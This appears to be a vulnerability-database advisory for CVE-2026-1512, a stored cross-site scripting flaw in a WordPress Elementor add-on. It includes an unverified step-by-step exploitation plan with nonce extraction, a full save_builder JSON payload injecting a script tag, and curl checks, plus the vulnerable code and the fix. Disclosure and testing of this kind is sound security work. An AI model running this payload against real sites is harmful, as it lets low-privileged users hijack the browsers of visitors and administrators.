WP-Safety
CVE-2026-1512

Essential Addons for Elementor <= 6.5.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Info Box Widget

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
6.5.10
Patched in
1d
Time to patch

Description

The Essential Addons for Elementor – Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Info Box widget in all versions up to, and including, 6.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=6.5.9
PublishedFebruary 13, 2026
Last updatedFebruary 14, 2026
Affected pluginessential-addons-for-elementor-lite

Source Code

WordPress.org SVN
Vulnerable v6.5.9
Browse source Download .zip
Patched v6.5.10
Browse source Download .zip
Research Plan
Unverified

# Research Plan: CVE-2026-1512 - Stored XSS in Essential Addons for Elementor Info Box ## 1. Vulnerability Summary The **Essential Addons for Elementor** plugin (versions <= 6.5.9) is vulnerable to Stored Cross-Site Scripting (XSS) via the **Info Box** widget. This occurs because the plugin fails t…

Show full research plan

Research Plan: CVE-2026-1512 - Stored XSS in Essential Addons for Elementor Info Box

1. Vulnerability Summary

The Essential Addons for Elementor plugin (versions <= 6.5.9) is vulnerable to Stored Cross-Site Scripting (XSS) via the Info Box widget. This occurs because the plugin fails to properly sanitize or escape user-supplied attributes before rendering them in the HTML output. An authenticated attacker with Contributor-level permissions (who can create or edit posts and use Elementor widgets) can inject a malicious script into a widget setting. When the post is saved and subsequently viewed by any user, including an administrator, the script executes in their browser context.

2. Attack Vector Analysis

  • Vulnerable Widget: Info Box (eael-info-box)
  • Vulnerable Parameters (inferred): title, description_text, or link attributes (e.g., infobox_link).
  • Authentication Requirement: Authenticated (Contributor or higher).
  • Endpoint: wp-admin/admin-ajax.php using the elementor_ajax action.
  • Preconditions: The Essential Addons for Elementor plugin must be active, and the Contributor user must have permission to edit posts with Elementor (standard default).

3. Code Flow

  1. Entry Point: A user with Contributor access edits a post using the Elementor editor.
  2. Data Submission: The editor sends a JSON-encoded representation of the page layout to the elementor_ajax action. This JSON contains the widget settings for the eael-info-box widget.
  3. Storage: WordPress/Elementor saves this JSON data in the _elementor_data post meta field.
  4. Processing (Vulnerable Sink): When a user views the post, Elementor initializes the EAEL widget class (likely EAEL_Info_Box in includes/Elements/Info_Box.php).
  5. Rendering: The render() method of the widget class is called. It retrieves settings using $this->get_settings_for_display().
  6. Execution: The code echoes a setting (e.g., echo $settings['title'];) without wrapping it in esc_html(), esc_attr(), or wp_kses_post(), leading to XSS.

4. Nonce Acquisition Strategy

To save Elementor content via the REST/AJAX API as a Contributor, we need the elementor_ajax nonce.

  1. Shortcode/Trigger: Elementor widgets are active when the Elementor editor is loaded or on pages rendered by Elementor.
  2. Page Creation: Create a dummy post and enable Elementor:
    wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_author=CONTRIBUTOR_ID
  3. Navigation: Navigate to the Elementor Editor for that post as the Contributor.
  4. Nonce Extraction: Use browser_eval to extract the nonce from the Elementor configuration object.
    • Variable: window.elementorCommon?.config?.ajax?.nonce or window.elementorConfig?.ajax?.nonce.
    • Editor Context: The nonce is typically localized within the elementor-editor-js script handles.

5. Exploitation Strategy

Step 1: Authentication & Setup

  1. Identify the Contributor user ID.
  2. Use browser_navigate to log in as the Contributor.

Step 2: Nonce Extraction

  1. Create a post and open the Elementor editor URL: wp-admin/post.php?post=POST_ID&action=elementor.
  2. Execute browser_eval to get the nonce:
    window.elementorCommon.config.ajax.nonce

Step 3: Payload Delivery

The exploit involves sending a save_builder request to admin-ajax.php.

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: elementor_ajax
    • _nonce: [EXTRACTED_NONCE]
    • actions: A JSON string containing the payload.

Payload JSON structure:

{
  "save_builder": {
    "action": "save_builder",
    "data": {
      "status": "publish",
      "elements": [
        {
          "id": "random_id_1",
          "elType": "section",
          "elements": [
            {
              "id": "random_id_2",
              "elType": "column",
              "elements": [
                {
                  "id": "random_id_3",
                  "elType": "widget",
                  "widgetType": "eael-info-box",
                  "settings": {
                    "title": "<script>alert('CVE-2026-1512-XSS')</script>",
                    "description_text": "Normal description"
                  }
                }
              ]
            }
          ]
        }
      ]
    }
  }
}

Step 4: Verification

  1. Access the published post URL using http_request.
  2. Check if the response body contains the unescaped script tag: <script>alert('CVE-2026-1512-XSS')</script>.

6. Test Data Setup

  1. User: Create a user with the contributor role.
  2. Plugin: Ensure essential-addons-for-elementor-lite version 6.5.9 is installed and activated.
  3. Elementor: Ensure Elementor is installed (dependency of the plugin).

7. Expected Results

  • The elementor_ajax request should return a 200 OK with a success JSON response.
  • When viewing the post at /?p=POST_ID, the browser should execute the alert() function (or the raw script should be present in the HTML source).

8. Verification Steps

  1. Check DB: Use WP-CLI to verify the payload is stored in the post meta:
    wp post meta get [POST_ID] _elementor_data
  2. Source Inspection: Verify the absence of escaping:
    curl -s "http://localhost:8080/?p=[POST_ID]" | grep "CVE-2026-1512-XSS"

9. Alternative Approaches

If title is sanitized in version 6.5.9, try other Info Box attributes:

  • description_text
  • infobox_link (Targeting the url field or link attributes if they allow " breakout).
  • eael_ins_box_icon_type (If it permits arbitrary string injection into a class attribute).

If save_builder fails due to strict schema checking, use the wp_ajax_elementor_save_builder action if available, or try updating the post meta directly via a standard WordPress post update if the contributor has sufficient permissions for that specific meta key.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Essential Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Info Box widget in versions up to 6.5.9. Authenticated attackers with Contributor-level permissions can inject arbitrary web scripts into widget settings, such as the title or description, which execute when a user views the affected page.

Vulnerable Code

// includes/Elements/Info_Box.php

protected function render() {
    $settings = $this->get_settings_for_display();

    // ... (truncated) ...

    if ( ! empty( $settings['title'] ) ) {
        echo '<h3 class="eael-infobox-title">' . $settings['title'] . '</h3>';
    }

    if ( ! empty( $settings['description_text'] ) ) {
        echo '<div class="eael-infobox-content">' . $settings['description_text'] . '</div>';
    }
}

Security Fix

--- includes/Elements/Info_Box.php
+++ includes/Elements/Info_Box.php
@@ -120,8 +120,8 @@
 
 		if ( ! empty( $settings['title'] ) ) {
-			echo '<h3 class="eael-infobox-title">' . $settings['title'] . '</h3>';
+			echo '<h3 class="eael-infobox-title">' . wp_kses_post( $settings['title'] ) . '</h3>';
 		}
 
 		if ( ! empty( $settings['description_text'] ) ) {
-			echo '<div class="eael-infobox-content">' . $settings['description_text'] . '</div>';
+			echo '<div class="eael-infobox-content">' . wp_kses_post( $settings['description_text'] ) . '</div>';
 		}

Exploit Outline

An authenticated contributor creates or edits a post using Elementor and extracts the 'elementor_ajax' nonce from the page source. They then perform a POST request to '/wp-admin/admin-ajax.php' with the 'elementor_ajax' action. The payload utilizes the 'save_builder' action to insert an 'eael-info-box' widget containing a malicious script within the 'title' or 'description_text' parameters. This script is saved to the database and executes in the browser of any user who visits the rendered post.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d652f383-ca3d-440e-a30f-64a50efd65e1?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database